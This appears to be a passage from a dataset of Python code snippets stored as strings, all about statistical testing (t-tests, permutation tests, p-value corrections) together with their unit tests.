ValueError('RSTATS.permTX: dataDict must be'\n + ' a dictionary with exactly 2 keys')\n k = list(dataDict.keys())\n g1 = dataDict[k[0]]\n g2 = dataDict[k[1]]\n\n u = perm.permTS(\n FloatVector(g1), FloatVector(g2), alternative='two.sided',\n method=mode)\n pvalue = float(u[3][0])\n if mode == 'exact.mc':\n nmc = int(u[10][0])\n else:\n nmc = 0\n d = u[1].items() # stored as a generator (interesting...) # using next for py2/3\n estdiff = next(d) #.next() # gets the tuple with what was measured, and the value \n if dataLabel is not None:\n print('\\nPermutation Test (R permTS). Dataset = %s' % (dataLabel))\n print(u' Test statistic: ({:s}): {:8.4f}'.\n format(estdiff[0], estdiff[1]))\n print(u' p={:8.6f}, Nperm={:8d} [mode={:s}]'.\n format(float(pvalue), int(nmc), mode))\n return (pvalue, nmc) # return the p value and the number of mc replicatess", "def t_test_(x):\n assert np.ndim(x) == 1 and (not np.any(np.isnan(x)))\n\n if (len(x) <= 1) or (not np.all(np.isfinite(x))):\n return 1.0 # Can't say anything about scale => p=1\n\n _, pval = sst.ttest_1samp(x, 0.0)\n if np.isnan(pval):\n # Should only be possible if scale underflowed to zero:\n assert np.var(x, ddof=1) <= 1e-100\n # It is debatable if the condition should be ``np.mean(x) == 0.0`` or\n # ``np.all(x == 0.0)``. Should not matter in practice.\n pval = np.float(np.mean(x) == 0.0)\n assert 0.0 <= pval and pval <= 1.0\n return pval", "def pvalue(data, control_label=None, *args, **kwargs):\n def fn(control, test):\n if _is_proportion(control, test):\n return ztest(control, test, alternative='two-sided')[1]\n else:\n return ttest_ind(control, test, alternative='two-sided')[1]\n\n return _apply(data, fn, control_label)", "def ttest(x):\n from ..group.onesample import stat\n t = stat(x.T, id='student', axis=0)\n return np.squeeze(t)", "def peak_reproducibility(data, vardata, domain, ngroups, sigma, method='crfx',\n swap=False, verbose=0, **kwargs):\n tiny = 1.e-15\n nsubj = data.shape[1]\n samples = draw_samples(nsubj, ngroups)\n all_pos = []\n\n # compute the positions in the different subgroups\n for i in range(ngroups):\n x = data[:, samples[i]]\n\n if swap:\n # apply a random sign swap to x\n x *= (2 * (np.random.rand(len(samples[i])) > 0.5) - 1)\n\n if method is not 'crfx':\n vx = vardata[:, samples[i]]\n if method is not 'bsa':\n threshold = kwargs['threshold']\n\n if method == 'crfx':\n stat_map = ttest(x)\n elif method == 'cmfx':\n stat_map = mfx_ttest(x, vx)\n elif method == 'cffx':\n stat_map = fttest(x, vx)\n elif method == 'cjt':\n if 'k' in kwargs:\n k = kwargs['k']\n else:\n k = nsubj / 2\n stat_map = conjunction(x, vx, k)\n\n pos = get_peak_position_from_thresholded_map(\n stat_map, domain, threshold)\n all_pos.append(pos)\n else:\n # method='bsa' is a special case\n tx = x / (tiny + np.sqrt(vx))\n afname = kwargs['afname']\n theta = kwargs['theta']\n dmax = kwargs['dmax']\n ths = kwargs['ths']\n thq = kwargs['thq']\n smin = kwargs['smin']\n niter = kwargs['niter']\n afname = afname + '_%02d_%04d.pic' % (niter, i)\n pos = coord_bsa(domain, tx, theta, dmax, ths, thq, smin, afname)\n all_pos.append(pos)\n\n # derive a kernel-based goodness measure from the pairwise comparison\n # of sets of positions\n score = 0\n for i in range(ngroups):\n for j in range(i):\n score += statistics_from_position(all_pos[i], all_pos[j], sigma)\n score += statistics_from_position(all_pos[j], all_pos[i], sigma)\n score /= (ngroups * (ngroups - 1))\n return score", "def test_all_pairs_t_test(self):\r\n # We aren't testing the numeric values here, as they've already been\r\n # tested in the functions that compute them. We are interested in the\r\n # format of the returned string.\r\n exp = \"\"\"# The tests of significance were performed using a two-sided Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean != Group 2 mean\r\n# The nonparametric p-values were calculated using 999 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00708047956412\t0.0212414386924\t0.095\t0.285\r\nfoo\tbaz\t-9.79795897113\t0.000608184944463\t0.00182455483339\t0.101\t0.303\r\nbar\tbaz\t-3.0\t0.0576688856224\t0.173006656867\t0.217\t0.651\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def _run_individual_permutation_tests(\r\n matrix: csr_matrix,\r\n seeds: List[types.BioEntity],\r\n uids: Dict[types.BioEntity, int],\r\n permutations: int = 250,\r\n alpha: np.double = 0.15,\r\n single: bool = False\r\n) -> pd.DataFrame:\r\n\r\n ## First get the proximity vector for the walk\r\n prox_vector = _run_individual_walks(matrix, seeds, uids, alpha, single=single)\r\n\r\n ## Start the permutation testing\r\n for i in range(permutations):\r\n\r\n ## Shuffle the node labels\r\n permuted_uids = graph.shuffle_node_labels(uids)\r\n\r\n ## Run the permuted walk\r\n permuted_vector = _run_individual_walks(\r\n matrix, seeds, permuted_uids, alpha, single=single\r\n )\r\n\r\n ## Join on the original results\r\n prox_vector[f'p_{i}'] = permuted_vector.probability\r\n\r\n return prox_vector", "def multi_point_mutation(variables_number: int,\n mutation_chance: float,\n mutation_points_number: int) -> MutationPointsTyping:\n scaled_mutation_chance = variables_number * mutation_chance / mutation_points_number\n if generate_random_float(0, 1) <= scaled_mutation_chance:\n return choose_random_values(values_pool=range(variables_number), values_number=mutation_points_number)\n return []", "def test_TPt(self):\n\n test_value = self.portfolio.calculate_total_performance(\n *self.boarder)[self.test_row_number]\n calculated_value = self.manual_cumprod(\n self.portfolio._get_total_portfolio)\n self.assertAlmostEqual(test_value, calculated_value)", "def t_test(result, reference):\n \n # Check that result and reference are 1D and that they have the same length\n \n print('\\nChecking that result and reference are 1D and that they have the same length\\n')\n \n if (len(result.shape) == 1) and (len(reference.shape) == 1):\n \n if len(result) == len(reference):\n \n print('Performing t test\\n')\n \n t_stat, p_value = scipy.stats.ttest_ind(result, reference)\n \n print('t test completed successfully!\\n')\n \n print('t statistic: {} // p value: {}'.format(t_stat, p_value))\n \n return t_stat, p_value\n \n else:\n \n print('Result and reference vectors do not have the same length. Please input them so that they have the same length')\n \n else:\n \n print('Result or reference vectors are not 1D. Please reformat them to be 1D')", "def ttest_2samp(x1, x2, alpha=0.05, paired=False, is_bernoulli=False, two_sided=True, return_tuple=False):\n x = np.asarray(x1)\n y = np.asarray(x2)\n\n # Define test degrees of freedom\n if two_sided:\n quant_order = 1 - (alpha / 2)\n h0 = 'X1_bar = X2_bar'\n h1 = 'X1_bar != X2_bar'\n else:\n quant_order = 1 - alpha\n h0 = 'X1 <= X2'\n h1 = 'X1 > X2'\n\n # Sample sizes\n n1, n2 = len(x), len(y)\n\n if paired:\n # If samples are paired, we perform a 1-sample student test\n # We compare if the difference is different from 0.\n mean1, mean2 = x.mean(), y.mean()\n d = x - y\n t, cv, p = ttest(d, alpha=alpha, return_tuple=True)\n df = len(d)\n else:\n # Else samples are independent\n # Compute means\n mean1, mean2 = x.mean(), y.mean()\n # Compute standard deviations\n if is_bernoulli:\n s1 = mean1 * (1 - mean1)\n s2 = mean2 * (1 - mean2)\n else:\n s1 = desc.var(x)\n s2 = desc.var(y)\n # Compute grouped variance\n sd = np.sqrt(((n1 - 1) * s1 + (n2 - 1) * s2) / (n1 + n2 - 2))\n # Degrees of freedom\n df = n1 + n2 - 2\n # Calculate the t statistic\n t = (mean1 - mean2) / sd\n\n # calculate the critical value\n cv = scp.t.ppf(quant_order, df)\n # calculate the p-value\n if (n1 > 30) & (n2 > 30):\n p = 2.0 * (1.0 - scp.norm.cdf(math.fabs(t)))\n else:\n p = 2.0 * (1.0 - scp.t.cdf(math.fabs(t), df=df))\n\n extra = f\" * E(X1) = {round(mean1, 3)} and E(X2) = {round(mean2, 3)} \\n\"\n extra += \" * Performed test for paired samples \\n\" if paired else ''\n extra += \" * Large sample sizes, t ~ N(0, 1) from CLT\" if (n1 > 30) & (n2 > 30) else ' * Small sample sizes, assumed t ~ T(n-1)'\n\n _summ = test_summary(df=df, critical_value=cv, t_value=t,\n p_value=p,\n title='Two Samples Student test',\n h0=h0, h1=h1,\n alpha=alpha,\n extra=extra)\n\n if return_tuple:\n return t, cv, p\n else:\n return _summ", "def correct_pvalues_for_multiple_testing(pvalues, correction_type = \"Benjamini-Hochberg\"):\n pvalues = array(pvalues)\n n = int(pvalues.shape[0])\n new_pvalues = empty(n)\n if correction_type == \"Bonferroni\":\n new_pvalues = n * pvalues\n elif correction_type == \"Bonferroni-Holm\":\n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ]\n values.sort()\n for rank, vals in enumerate(values):\n pvalue, i = vals\n new_pvalues[i] = (n-rank) * pvalue\n elif correction_type == \"Benjamini-Hochberg\":\n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ]\n values.sort()\n values.reverse()\n new_values = []\n for i, vals in enumerate(values):\n rank = n - i\n pvalue, index = vals\n new_values.append((n/rank) * pvalue)\n for i in range(0, int(n)-1):\n if new_values[i] < new_values[i+1]:\n new_values[i+1] = new_values[i]\n for i, vals in enumerate(values):\n pvalue, index = vals\n new_pvalues[index] = new_values[i]\n return new_pvalues", "def ttest(\n data, dataLabel=None, paired=False, decimals=4,\n textline=False, units=None\n ):\n\n # test calling values\n if data is None or not isinstance(data, dict) or len(data.keys()) != 2:\n raise ValueError('RSTATS.ttest: data must be a dictionary'\n + ' with at exactly 2 keys'\n + '\\nUse KW (anova) for more than 2 groups')\n\n k = list(data.keys())\n g = {}\n n = {}\n gmean = {}\n gstd = {}\n\n g[1] = data[k[0]]\n g[2] = data[k[1]]\n n[1] = len(g[1])\n n[2] = len(g[2])\n # (w1, p1) = Stats.shapiro(g1, a=None, reta=False)\n # (w2, p2) = Stats.shapiro(g2, a=None, reta=False)\n # Tb, pb = Stats.bartlett(g1, g2) # do bartletss for equal variance\n equalVar = False\n\n if paired:\n print (len(g[1]), len(g[2]))\n (t, p) = Stats.ttest_rel(g[1], g[2])\n else:\n (t, p) = Stats.ttest_ind(g[1], g[2], equal_var=equalVar)\n gmean[1] = np.mean(g[1])\n gstd[1] = np.std(g[1], ddof=1)\n gmean[2] = np.mean(g[2])\n gstd[2] = np.std(g[2], ddof=1)\n # df = (tstd[k]**2/tN[k] + dstd[k]**2/dN[k])**2 / (( (tstd[k]**2 /\n # tN[k])**2 / (tN[k] - 1) ) + ( (dstd[k]**2 / dN[k])**2 / (tN[k] - 1) ) )\n df = ((gstd[1]**2/n[1] + gstd[2]**2/n[2])**2\n / (((gstd[1]**2 / n[1])**2 / (n[1] - 1)\n + ((gstd[2]**2 / n[2])**2 / (n[1] - 1))))\n )\n if dataLabel is not None:\n testtype = 'Independent'\n if paired:\n testtype = 'Paired'\n n = max([len(l) for l in k])\n print ('\\n%s\\n %s T-test, Welch correction' % (dataLabel, testtype))\n # if p1 < 0.05 and p2 < 0.05:\n # print(u' Both data sets appear normally distributed: Shapiro-Wilk Group 1 p = {:6.3f}, Group2 p = {:6.3f}'.format(p1, p2))\n # else:\n # print(u' ****At least one Data set is NOT normally distributed****\\n Shapiro-Wilk Group 1 p = {:6.3f}, Group2 p = {:6.3f}'.format(p1, p2))\n # print (u' (performing test anyway, as requested)')\n # if equalVar:\n # print(u' Variances are equivalent (Bartletts test, p = {:.3f})'.format(pb))\n # else:\n # print(u' Variances are unequal (Bartletts test, p = {:.3f}); not assuming equal variances'.format(pb))\n print(u' {:s}={:8.{pc}f} (SD {:.{pc}f}, N = {:d})'.\n format(k[0].rjust(n), gmean[1], gstd[1],\n len(g[1]), pc=decimals))\n print(u' {:s}={:8.{pc}f} (SD {:.{pc}f}, N = {:d})'.\n format(k[1].rjust(n), gmean[2], gstd[2],\n len(g[2]), pc=decimals))\n print(u' t({:6.2f})={:8.4f} p={:8.6f}\\n'.\n format(df, float(t), float(p)))\n # generate one line of text suitable for pasting into a paper\n if textline:\n if units is not None:\n units = ' ' + units\n else:\n units = ''\n fmtstring = u'{:s}: {:.{pc}f} (SD {:.{pc}f}, N={:d}){:s}; '\n print(u'(', end='')\n for s in range(1, 3):\n print(fmtstring.format(\n k[s-1], gmean[s], gstd[s], len(g[s]), units, \n pc=decimals), end='')\n print(u't{:.2f}={:.3f}, p={:s})\\n'.format(df, float(t), pformat(p)))\n\n return(df, float(t), float(p))", "def multiple_testing_correction(pvalues, correction_type=\"FDR\"):\n from numpy import array, empty\n pvalues = array(pvalues)\n sample_size = pvalues.shape[0]\n qvalues = empty(sample_size)\n if correction_type == \"Bonferroni\":\n # Bonferroni correction\n qvalues = sample_size * pvalues\n elif correction_type == \"Bonferroni-Holm\":\n # Bonferroni-Holm correction\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\n values.sort()\n for rank, vals in enumerate(values):\n pvalue, i = vals\n qvalues[i] = (sample_size-rank) * pvalue\n elif correction_type == \"FDR\":\n # Benjamini-Hochberg, AKA - FDR test\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\n values.sort()\n values.reverse()\n new_values = []\n for i, vals in enumerate(values):\n rank = sample_size - i\n pvalue, index = vals\n new_values.append((sample_size/rank) * pvalue)\n for i in range(0, int(sample_size)-1):\n if new_values[i] < new_values[i+1]:\n new_values[i+1] = new_values[i]\n for i, vals in enumerate(values):\n pvalue, index = vals\n qvalues[index] = new_values[i]\n return qvalues", "def posterior_sampler(self, nsamples, seed=0, verbose=True):\n\n import random\n\n random.seed(seed)\n sample = self.get_chain()[-self.get_tune:]\n sample = sample.reshape(-1, sample.shape[-1])\n sample = random.choices(sample, k=nsamples)\n\n return sample", "def test_2_1(self):\r\n input = matrix()\r\n p = ivector()\r\n out = permute_row_elements(input, p)\r\n permute = function([input, p], out)\r\n\r\n rng = numpy.random.RandomState(utt.fetch_seed())\r\n input_val = rng.uniform(size=(3, 5)).astype(config.floatX)\r\n p_val = rng.permutation(5).astype('int32')\r\n out_val = permute(input_val, p_val)\r\n\r\n # The same permutation should be applied to every row of the input matrix.\r\n out_bis = numpy.asarray([r[p_val] for r in input_val])\r\n assert numpy.all(out_val == out_bis)\r\n\r\n # Verify gradient\r\n def permute_fixed(s_input):\r\n \"\"\"Auxiliary op defined to get rid of gradient wrt p_val\"\"\"\r\n return permute_row_elements(s_input, p_val)\r\n utt.verify_grad(permute_fixed, [input_val])", "def test_repeated_right_tailed(self):\n rng = np.random.default_rng(3571954324)\n\n passed = 0\n n_iter = 500\n for _ in range(n_iter):\n data1 = rng.normal(2, 1, 100)\n data2 = data1 + rng.normal(0, .02, 100)\n\n ttest = repeated_ttest(data1, data2, 'right')\n\n if ttest['P_value'] < .05:\n passed +=1\n\n self.assertAlmostEqual(passed / n_iter, .05, delta=.01)", "def testEjemploTp(self):\n azul = [0, 4, 5, 0]\n rojo = [1, 7, 4, 0]\n amarillo = [3, 6, 8, 0]\n negro = [6, 10, 10, 0]\n magenta = [7, 8, 12, 0]\n verde = [9, 11, 11, 0]\n perfiles = []\n perfiles.append(azul)\n perfiles.append(rojo)\n perfiles.append(amarillo)\n perfiles.append(negro)\n perfiles.append(magenta)\n perfiles.append(verde)\n perfil = Perfil.Perfil()\n resultadoEsperado = [0, 4, 1, 7, 4, 6, 6, 10, 9, 11, 11, 8, 12]\n for x in range(10000):\n inicial = random_integers(6, 0)\n inicial = inicial*4\n perfilOriginal = []\n for i in range (inicial, len(perfiles)+inicial, 1):\n perfilOriginal += perfiles[i%len(perfiles)]\n \n resultado = perfil.calcularPerfil(perfilOriginal, 0)\n self.assertEqual(resultadoEsperado, resultado)", "def test_mc_t_two_sample_single_obs_sample(self):\r\n sample = array([4.02, 3.88, 3.34, 3.87, 3.18])\r\n x = array([3.02])\r\n exp = (-1.5637254, 0.1929248)\r\n obs = mc_t_two_sample(x, sample)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertFloatEqual(len(obs[2]), 999)\r\n self.assertIsProb(obs[3])\r\n\r\n exp = (1.5637254, 0.1929248)\r\n obs = mc_t_two_sample(sample, x)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertFloatEqual(len(obs[2]), 999)\r\n self.assertIsProb(obs[3])\r\n\r\n # Test the case where we can have no variance in the permuted lists.\r\n x = array([1, 1, 2])\r\n y = array([1])\r\n exp = (0.5, 0.666666666667)\r\n obs = mc_t_two_sample(x, y)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertFloatEqual(len(obs[2]), 999)\r\n self.assertIsProb(obs[3])", "def test_TLearner(self):\n # TLearner test\n # Instantiate TLearner\n Y, T, X, _ = ihdp_surface_B()\n est = AutomatedTLearner(models=automl_model_reg())\n\n # Test constant and heterogeneous treatment effect, single and multi output y\n\n est.fit(Y, T, X=X)\n _ = est.effect(X)", "def test_all_pairs_t_test_invalid_tests(self):\r\n exp = \"\"\"# The tests of significance were performed using a one-sided (high) Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean > Group 2 mean\r\n# The nonparametric p-values were calculated using 20 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\tN/A\tN/A\tN/A\tN/A\tN/A\r\n\"\"\"\r\n obs = all_pairs_t_test(['foo', 'bar'], [[], [1, 2, 4]],\r\n 'high', 20)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def test_on_posterior(test_data, test_label, posterior_samples):\n print(\"Testing on posterior samples...\")\n num_posterior_samples = posterior_samples.shape[0]\n avg_pred_test = np.zeros((num_posterior_samples, ))\n avg_pred_log_lld = np.zeros((num_posterior_samples, ))\n \n for k in range(num_posterior_samples):\n # Use the posterior samples\n w_sampled = posterior_samples[k]\n \n # Get the hessian\n #pred, dot_product = get_output(w_sampled, train_data)\n #hessian = get_hessian (phi= train_data, pred= pred[:, np.newaxis], t= train_label[:, np.newaxis], dot_product= dot_product)\n \n pred_test, _ = get_output (w_sampled, test_data)\n acc = get_accuracy(pred_test, test_label) \n pred_likelihood = get_prediction_likelihood_without_complications(test_data, test_label, w_sampled) #get_prediction_likelihood(test_data, test_label, w_sampled, hessian)\n avg_pred_test[k] = acc\n avg_pred_log_lld [k] = np.log(pred_likelihood)\n \n if (k+1)%100 == 0 or k== num_posterior_samples-1:\n print(\"{:5d} Posterior Weight samples Test_data Pred_acc= {:.2f}, Pred_log_likelihood= {:.2f}\".format(k+1, np.mean(avg_pred_test[:k]), np.mean(avg_pred_log_lld[:k])))", "def test_sample_perturb(self):\n self.data = pd.read_csv(pkg_resources.resource_filename(resource_package, 'tests/testing_data/test_sample_perturb.csv'),\n index_col=False)\n\n self.testpos = utils.sample_perturb(self.data, crime_type='Anti-social behaviour', pct_change=1.1)\n\n self.testneg = utils.sample_perturb(self.data, crime_type='Violence and sexual offences', pct_change=0.666)\n\n self.assertEqual(self.testpos.loc[0,'Counts'], 11)\n\n self.assertEqual(self.testneg.loc[4,'Counts'], 10)", "def compute_pvalue(self):\n # Run permutation test\n self.PermutationTest()\n # TS obtained from the original B,T samples\n self.compute_obs_TS()\n \n # Mean and std of the TS distribution\n self.mu = np.mean(self.TS_tilde)\n self.sigma = np.std(self.TS_tilde)\n \n # Standardized test statistic (zero mean, unit variance)\n self.TS_prime = (self.TS_tilde - self.mu)/self.sigma\n self.TS_prime_obs = (self.TS_obs - self.mu)/self.sigma\n \n # Two-sided p-value from TS' distribution\n self.p_value = 2*(1 - 0.01 * stats.percentileofscore(self.TS_prime,\n abs(self.TS_prime_obs)) )\n \n # if 0, compute it from standard normal\n if self.p_value == 0.0:\n self.p_value = self.pvalue_gaussian()\n \n print(\"\")\n print(\"p-value = {:e}\".format(self.p_value))", "def league_ttest(df_league_one: pd.DataFrame, df_league_two: pd.DataFrame, parameter: str, alpha: float, ):\n assert isinstance(df_league_one, pd.DataFrame), 'df_league_one needs to be a pandas dataframe.'\n assert isinstance(df_league_two, pd.DataFrame), 'df_league_two needs to be a pandas dataframe.'\n assert isinstance(alpha, float), 'alpha needs to be a float.'\n\n\n df_league_one_mean = df_league_one.mean()\n n = len(df_league_one['club'])\n df = n-1\n t_critical = stats.t.ppf(1-alpha, df)\n leagues_ttest = stats.ttest_1samp(a= df_league_two[f'{parameter}'], popmean= df_league_one_mean)\n t_value = leagues_ttest[0]\n p_value = leagues_ttest[1]\n\n stats_values = {}\n\n stats_values['p_value'] = round(list(p_value)[0], 4)\n\n if stats_values['p_value'] < alpha:\n return ('Enough evidence to reject null hypothesis')\n elif stats_values['p_value'] > alpha:\n return ('Not enough evidence to reject null hypothesis')", "def ttest_ind(self, alternative=\"two-sided\", usevar=\"pooled\", value=0):\n d1 = self.d1\n d2 = self.d2\n\n if usevar == \"pooled\":\n stdm = self.std_meandiff_pooledvar\n dof = d1.nobs - 1 + d2.nobs - 1\n elif usevar == \"unequal\":\n stdm = self.std_meandiff_separatevar\n dof = self.dof_satt()\n else:\n raise ValueError('usevar can only be \"pooled\" or \"unequal\"')\n\n tstat, pval = _tstat_generic(\n d1.mean, d2.mean, stdm, dof, alternative, diff=value\n )\n\n return tstat, pval, dof", "def calculate_t_test(mean1, mean2, var1, var2, n1, n2, alpha):\n # Two Sample T Test (M0 == M1) (Two Tails)\n t = (mean1 - mean2) / sqrt((var1 / n1) + (var2 / n2)) # t statistic calculation for two sample\n df = n1 + n2 - 2 # degree of freedom for two sample t - set\n pval = 1 - stats.t.sf(np.abs(t), df) * 2 # two-sided pvalue = Prob(abs(t)>tt) # p - value\n cv = stats.t.ppf(1 - (alpha / 2), df)\n standart_error = cv * sqrt((var1 / n1) + (var2 / n2))\n confidence_intervals = [abs(mean1 - mean2) - standart_error, abs(mean1 - mean2) + standart_error, standart_error]\n acception = 'HO REJECTED!' if pval < (alpha / 2) else 'HO ACCEPTED!' # left tail\n acception = 'HO REJECTED!' if pval > 1 - (alpha / 2) else 'HO ACCEPTED!' # right tail\n return pval, confidence_intervals, acception", "def test_repeated_two_tailed(self):\n rng = np.random.default_rng(6464584234)\n\n passed = 0\n n_iter = 500\n for _ in range(n_iter):\n data1 = rng.normal(10, 2, 100)\n data2 = data1 + rng.normal(0, .02, 100)\n\n ttest = repeated_ttest(data1, data2)\n\n if ttest['P_value'] < .05:\n passed +=1\n\n self.assertAlmostEqual(passed / n_iter, .05, delta=.01)", "def t_one_sample(a, popmean=0, tails=None):\r\n try:\r\n n = len(a)\r\n t = (mean(a) - popmean) / (std(a) / sqrt(n))\r\n except (ZeroDivisionError, ValueError, AttributeError, TypeError,\r\n FloatingPointError):\r\n return nan, nan\r\n if isnan(t) or isinf(t):\r\n return nan, nan\r\n\r\n prob = t_tailed_prob(t, n - 1, tails)\r\n return t, prob", "def test_t_paired_2tailed(self):\r\n x, y = self.x, self.y\r\n # check value of t and the probability for 2-tailed\r\n self.assertFloatEqual(t_paired(y, x)[0], 19.7203, 1e-4)\r\n self.assertFloatEqual(t_paired(y, x)[1], 1.301439e-11, 1e-4)", "def pval(self, distances, n_permutations=1000):\n if isinstance(distances, Variable):\n distances = distances.data\n return permutation_test_mat(distances.cpu().numpy(),\n self.n_1, self.n_2,\n n_permutations,\n a00=self.a00, a11=self.a11, a01=self.a01)", "def ks_permutation_var(stat, series1, series2):\n x1 = series1\n x2 = series2\n lx1 = len(x1)\n lx2 = len(x2)\n data_x = np.concatenate([x1, x2], axis=0)\n rng = np.random.default_rng(seed=42)\n ks_res = []\n n_samp = 1000\n for j in range(n_samp):\n x_con = rng.permutation(data_x)\n x1_perm = x_con[:lx1]\n x2_perm = x_con[lx2:]\n ks_res.append(stats.ks_2samp(x1_perm, x2_perm)[0])\n ks_list = np.sort(ks_res)\n ks_arg = np.arange(start=1, stop=n_samp+1)/n_samp\n p_val = 1-np.interp(stat, ks_list, ks_arg)\n return p_val", "def test_1_2(self):\r\n input = vector()\r\n p = imatrix()\r\n out = permute_row_elements(input, p)\r\n permute = function([input, p], out)\r\n\r\n rng = numpy.random.RandomState(utt.fetch_seed())\r\n input_val = rng.uniform(size=(5,)).astype(config.floatX)\r\n p_val = numpy.asarray([rng.permutation(5) for i in range(3)\r\n ], dtype='int32')\r\n out_val = permute(input_val, p_val)\r\n\r\n # Each row of p contains a permutation to apply to the input vector\r\n out_bis = numpy.asarray([input_val[p_row] for p_row in p_val])\r\n assert numpy.all(out_val == out_bis)\r\n\r\n # Verify gradient\r\n def permute_fixed(s_input):\r\n \"\"\"Auxiliary op defined to get rid of gradient wrt p_val\"\"\"\r\n return permute_row_elements(s_input, p_val)\r\n utt.verify_grad(permute_fixed, [input_val])", "def report_ttest_2sample(null_hypothesis, sample1, sample2, paired, alpha=0.05):\n\n if paired:\n t_value, p_value = stats.ttest_rel(sample1, sample2)\n else:\n t_value, p_value = stats.ttest_ind(sample1, sample2)\n print('Test for null hypothesis \"{}\".'.format(null_hypothesis))\n print('Sample 1 mean: {}, Sample 1 SD: {}'.format(np.mean(sample1), np.std(sample1)))\n print('Sample 2 mean: {}, Sample 2 SD: {}'.format(np.mean(sample2), np.std(sample2)))\n print('t({})={}, p={}.'.format(len(sample1)-1, t_value, p_value))\n if p_value < alpha:\n print('Reject null hypothesis.\\n')\n else:\n print('Fail to reject null hypothesis.\\n')", "def lttest_rel (a,b,printit=0,name1='Sample1',name2='Sample2',writemode='a'):\r\n if len(a)<>len(b):\r\n raise ValueError, 'Unequal length lists in ttest_rel.'\r\n x1 = mean(a)\r\n x2 = mean(b)\r\n v1 = var(a)\r\n v2 = var(b)\r\n n = len(a)\r\n cov = 0\r\n for i in range(len(a)):\r\n cov = cov + (a[i]-x1) * (b[i]-x2)\r\n df = n-1\r\n cov = cov / float(df)\r\n sd = math.sqrt((v1+v2 - 2.0*cov)/float(n))\r\n t = (x1-x2)/sd\r\n prob = betai(0.5*df,0.5,df/(df+t*t))\r\n\r\n if printit <> 0:\r\n statname = 'Related samples T-test.'\r\n outputpairedstats(printit,writemode,\r\n name1,n,x1,v1,min(a),max(a),\r\n name2,n,x2,v2,min(b),max(b),\r\n statname,t,prob)\r\n return t, prob", "def distribute_individual_permutation_tests(\r\n matrix: csr_matrix,\r\n seeds: List[types.BioEntity],\r\n uids: Dict[types.BioEntity, int],\r\n output: str,\r\n permutations: int = 250,\r\n alpha: np.double = 0.15,\r\n procs: int = os.cpu_count(),\r\n single: bool = False,\r\n fdr: bool = False\r\n) -> None:\r\n\r\n client = get_client()\r\n\r\n log._logger.info('Scattering data to workers...')\r\n\r\n ## Scatter data onto workers\r\n [matrix] = client.scatter([matrix], broadcast=True)\r\n [uids] = client.scatter([uids], broadcast=True)\r\n futures = []\r\n\r\n if single:\r\n seeds = [seeds] # type: ignore\r\n\r\n for s in seeds:\r\n\r\n log._logger.info('Running permutation tests...')\r\n\r\n permuted_futures = []\r\n s = client.scatter([s], broadcast=True)\r\n\r\n ## Split the number of permutations evenly\r\n for chunk in np.array_split(np.zeros(permutations), procs):\r\n\r\n prox_vector_future = client.submit(\r\n _run_individual_permutation_tests,\r\n matrix,\r\n s,\r\n uids,\r\n len(chunk),\r\n alpha,\r\n pure=False,\r\n single=single\r\n )\r\n\r\n permuted_futures.append(prox_vector_future)\r\n\r\n futures.append(permuted_futures)\r\n\r\n log._logger.info('Calculating p-values...')\r\n\r\n ## Wait for testing to finish\r\n for i, test in enumerate(futures):\r\n\r\n ## Gather the results of the permutation tests for this specific seed node\r\n test = client.gather(test)\r\n ## Get the first test so we keep the node_from, node_to, and prob. columns and\r\n ## concat the walk scores from the rest.\r\n prox_vector = test.pop(0)\r\n\r\n ## Get rid of node_from, node_to, prob. columns from the rest of the tests and\r\n ## only keep their permuted walk scores\r\n for df in test:\r\n prox_vector = pd.concat([\r\n prox_vector,\r\n df.drop(columns=['node_from', 'node_to', 'probability'])\r\n ], axis=1)\r\n\r\n ## Calculate the p-value\r\n prox_vector = _calculate_p(prox_vector, permutations)\r\n\r\n ## FDR adjusted p-values\r\n if fdr:\r\n prox_vector = _adjust_fdr(prox_vector)\r\n\r\n ## Create a new file if necessary\r\n if i == 0:\r\n _make_ness_header_output(output, p=True, q=fdr)\r\n\r\n ## Save the output\r\n _append_ness_output(output, prox_vector)", "def get_stat_dif(column, target_column, data, alpha):\n cols = data.loc[:, column].value_counts().index[:]\n combinations_all = list(combinations(cols, 2))\n for comb in combinations_all:\n a = data.loc[data.loc[:, column] == comb[0], target_column]\n b = data.loc[data.loc[:, column] == comb[1], target_column]\n result = ttest_ind(a, b).pvalue\n\n if result <= alpha/len(combinations_all):\n print('Найдены статистически значимые различия для колонки', column)\n break", "def correlation_test(x_items, y_items, method='pearson', tails=None,\r\n permutations=999, confidence_level=0.95):\r\n # Perform some initial error checking.\r\n if method == 'pearson':\r\n corr_fn = pearson\r\n elif method == 'spearman':\r\n corr_fn = spearman\r\n else:\r\n raise ValueError(\"Invalid method '%s'. Must be either 'pearson' or \"\r\n \"'spearman'.\" % method)\r\n if tails is not None and tails != 'high' and tails != 'low':\r\n raise ValueError(\"Invalid tail type '%s'. Must be either None, \"\r\n \"'high', or 'low'.\" % tails)\r\n if permutations < 0:\r\n raise ValueError(\"Invalid number of permutations: %d. Must be greater \"\r\n \"than or equal to zero.\" % permutations)\r\n if confidence_level <= 0 or confidence_level >= 1:\r\n raise ValueError(\"Invalid confidence level: %.4f. Must be between 